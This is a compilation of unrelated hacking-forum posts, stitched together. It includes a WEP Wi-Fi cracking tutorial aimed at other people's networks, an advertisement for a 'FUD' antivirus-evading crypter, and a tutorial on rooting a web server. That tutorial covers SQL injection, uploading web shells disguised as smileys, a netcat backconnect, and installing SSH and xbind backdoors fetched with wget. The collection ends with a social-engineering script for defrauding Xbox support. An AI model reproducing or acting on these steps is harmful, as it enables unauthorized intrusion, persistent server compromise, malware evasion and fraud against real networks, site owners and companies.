[TuT] Hacking WEP Wifi Passwords

Basic Entry into a WEP Encrypted Network

**DISCLAIMER** - I know that many people have thrown up various tutorials before about hacking wep with Backtrack 3 but I never felt that they fully explained everything very well for noobs. (at least not the ones I read) This is in no way meant to attack someone else that has posted a tut on this before...I simply wanted to put one up that was very easy to follow even if you had never done anything like this before. Since this explains EVERYTHING in detail, it is quite long. Enjoy.

1. Getting the right tools

Download Backtrack 3. It can be found here:

http://www.remote-exploit.org/backtrack_download.html

The Backtrack 4 beta is out but until it is fully tested (especially if you are a noob) I would get the BT3 setup. The rest of this guide will proceed assuming you downloaded BT3. I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and reboot your computer into BT3. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.

2. Preparing the victim network for attack

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
Type:

airmon-ng

You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card.
Now type:

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then:

macchanger --mac 00:11:22:33:44:55 wifi0

then:

airmon-ng start wifi0

What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computeris discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on...
Now it's time to discover some networks to break into.

Type:

airodump-ng ath0

Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:

hold down ctrl and tap c

This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.

**Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type:
-c (channel)
then dont actually type in
-c (channel)
Instead, replace that with whatever the channel number is...so, for example you would type:
-c 6
Can't be much clearer than that...lets continue...

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.



Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n
The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.

Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.

3. Actually cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

http://i574.photobucket.com/albums/ss184...eplay1.jpg

This will send some commands to the router that basically cause it to associate with your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" If this happens, then good! You are almost there. Now type:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

http://i574.photobucket.com/albums/ss184...eplay2.jpg

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

http://i574.photobucket.com/albums/ss184...crack1.jpg

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF
Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)

I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.

There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.

Charny Screenshot tool v1.4

Charny Screenshot tool is a program that takes screenshots of your screen.

New features in v1.4 :

• Bug fixes
• New layout
• Take a screenshot of the active window
• Copy image to clipboard
• And much more.
  

Screenshots :

The main form :


The logs :


The notify icon :


You can upload your images to ImageShack :


Virus Scan :

Spoiler (Click to View)

Quote:File Info

Report date: 2010-06-04 21:00:50 (GMT 1)
File name: CSTv1.4.zip
File size: 30234 bytes
MD5 Hash: bfea7a579268071ed844651ea12f35e8
SHA1 Hash: 356eca1e285cffcb68c20b8390fe6639ab35b1e2
Detection rate: 0 on 19 (0%)
Status: CLEAN

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org

Download :

[ Source ] Toxic Crypter

The basic CyCrypter but I completly remodified it and made the stub FUD

The stub right now 4/22/10 Is 1/21 but if you use the icon changer then its FUD 0/21 only Avira detects it.

Screenshots Below




In order to make the stub work and be 100% FUD do this



Download For Source

Code:

http://www.mediafire.com/?2nldzyjoj5g

---

[TuT] How to Boost Your Wireless Internet Signal From You Router

Here is my TuT on how to Boost your Wireless internet [For Your Laptop, PSP, Wii..]

OK There are 2 Ways
~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--
~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--
The Ez-12 Parabolic Reflector "Way"

Spoiler (Click to View)

Note: If printed at the download size you will see about 9 dBi of gain. If you double the size of the image before you print it you will see about 12 dBi of gain. If you place two reflectors on an AP with two antennas you will see an additional increase in performance.

First Right Click and "Save Image As"



Now open in Paint or what ever you want and Resize to desired size. Ensure that you keep the square on the diagram square.[Hold Shift and Then Resize]
Print image out and glue on Thick Piece of Paper
Cut it out and open the Six slots with Sissors
Glue aluminum/tin foil to the reflector surface
Assemble by placing the Six tabs in the Six slots
It should end up looking like this:

~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--
~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--
The Ez-10 10 dBi Corner Reflector "Way"

Spoiler (Click to View)

Basically same as the other one

First Right Click and "Save Image As" Both of Them





Now open in Paint or what ever you want and Resize to desired size. Ensure that you keep the square on the diagram square.[Hold Shift and Then Resize]
Print image out and glue on Thick Piece of Paper
Cut it out and open the Six slots with Sissors
Glue aluminum/tin foil to the reflector surface
Assemble by placing the Six tabs in the Six slots
It should end up looking like this:

~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--
~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--

for the EZ-12
If printed at the download size you will see about 9 dBi of gain. If you double the size of the image before you print it you will see about 12 dBi of gain. If you place two reflectors on an AP with two antennas you will see an additional increase in performance

and For the EZ-10
you will get about 11 dBi extra

i personally like the EZ-10 Better because its easier to make and i think it boosts my internet more.

Exploiting and Rooting a Webserver from

Scratch Complete Tutorial

Intro:

Hey guys this is The 7th Sage and for todays tutorial we shall learn how to

exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.

1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access

Hacking a Forum Admin using Exploit to Gain

Admin Access - Part 1

As said earlier i'm going to exploit ipb v2.1 forum here. You can hack

other forums too using exploits or making own exploits (which is rare :P)

Tools Needed:

This has the shell and backdoor files along with MD5 HashCracking tool and

some other things.




Download:

Code:

http://depositfiles.com/files/9juskrtax

Gaining Admin Access.

For today i will be hacking an ipb 2.1 forum by gaining admin access and

then I will show you how to root the server.

First i will be using a perl exploit and gain admin access to the forum. Usually the admin id

is 1 maybe 0 or 2 sometimes.

Here it is this guy:

UserName: Kawool
UserId = 2

Next we extract the user hash and salt. Switch to cmd and execute the perl

exploit.



Then you should see this sql injection tool.

Change the forum index path, userid (of the admin), the table name.



After you click get data from database you should see this hash:





Then use converage pass salt option.





After you get the hash the next step to do is crack the salted hash. Since

it is ipb , cracking the hash will be a pain for sure.


Cracking the Hash:

I have provided passwords pro in the download above. It is a very efficient

tool to crack md5 hashes, even salted ones.



Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.

I got mine after sometime.



So now

Code:

Username: Kawool

Password: *******

I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.

Uploading The Shell as Admin - Part 2

Uploading a Shell:


Now that we have the admin access in our hand now is the part when we

upload a shell (For those who don't know what a shell is, It is a php script that gives

privilages to upload files on a website, mess with other files etc. And yeah allows to gain

root access too).

Uploading shell as smiley here.

In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.




Now lets browse our shell shall we..



w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did

this is because c99 shells can be detected somwetimes. So the other shell is like a decoy.

Once its done we upload c99 shell.



Good shell was uploaded properly.



That does it for our 2nd part. Move on to Third.

---

Using the Shell to Gain Root Access - Part 3

Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.

So i upload back.pl i provided in the file.



After thats done time to use the script.

For this we give the following code.

Code:

perl back.pl youripaddress

BEFORE we execute the script we need to start netcat and start listening to conenctions on

port 2121.

use netcat from my downloadfile, and use the command:

Code:

nc -vv -l -p 2121

You should see something like this





Next we shall upload an exploit that will let us obtain root status on the server :)



Time to execute it.



Now we upload a backdoor for future access.

Type in the following command

Code:

wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)

Now the following command.

Code:

tar -zxvf sshdoor.tgz

Then we make sshdoor the current directory using this code..

Code:

cd sshdoor

Then

Code:

cat README

after you see the window with sang and prabu name. Execute the command

Code:

.install yourpassword 2121

After thats done, we connect to the server via putty.




Err an Epic Fail has occured my friends.



Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win :D (actually hackers do O_O).


Now we upload xbind.c this should be over quickly. Remember the steps don't you?:D

Indeed its easy.




Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script).

Code:

gcc -o xbind xbind.c

Compile, run and connect.

Paste the following code now

Code:

./xbind 1985

Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.

Now enter teh password and get going.

Code:

uname -a

There you go, we now have future access to the server :)

[TuT] How To Get Free Xbox Stuff

Introduction

Here I will explain how you can Social Engeneer and get a free xbox controller. This can be used for pretty much all products from microsoft but I don't know anyone who has tried this with an xbox :P.

Step 1

First you have to get the serial number from your xbox, sometimes they ask for this. It is located on the back of your xbox 360 console. Once you get this you can call them. The number for xbox support is:

• Toll free (North American): (800) 4MY-XBOX
• Direct dial (North American): (425) 635-7180
• Freephone (Europe): 0800 587 1102
  

Step 2

Ok when you call you have to get to the repairs line. Once you get to a non-computerized person, ask them the status on your xbox live remote control. Tell them:

• It was an Elite controller.
• You sent it around a month ago
  

They will ask you your address and stuff, give it to them. Then they will say "We don't have record of your controller" Tell them something like the right trigger was stuck in. Start to sound mad saying I sent this such a long time ago. Normally they will say we only have white stock controllers, sound mad and say that will have to due. If they refuse ask to speak to a supervisor and sound really pissed off.

Conclusion

Wait a week or two and you should have a new xbox 360 controller in the mail. You can do this to get:

• Headset
• Transfer cable (Don't tell them you broke it, say you got a new xbox and want to xfer your data)
• Possibly a new hd, haven't tried though.
• Memory sticks
• Wifi adapters
• Microsoft points. You need to say that you cant download the DLC you buyed with the points.
• Pretty much whatever.
  

If anyone tries this to get a new xbox post here and tell me if it works out for you. Because that would be pretty cool.

[TuT] Hack vBulletin 3 and Above

This summary is not available. Please click here to view the post.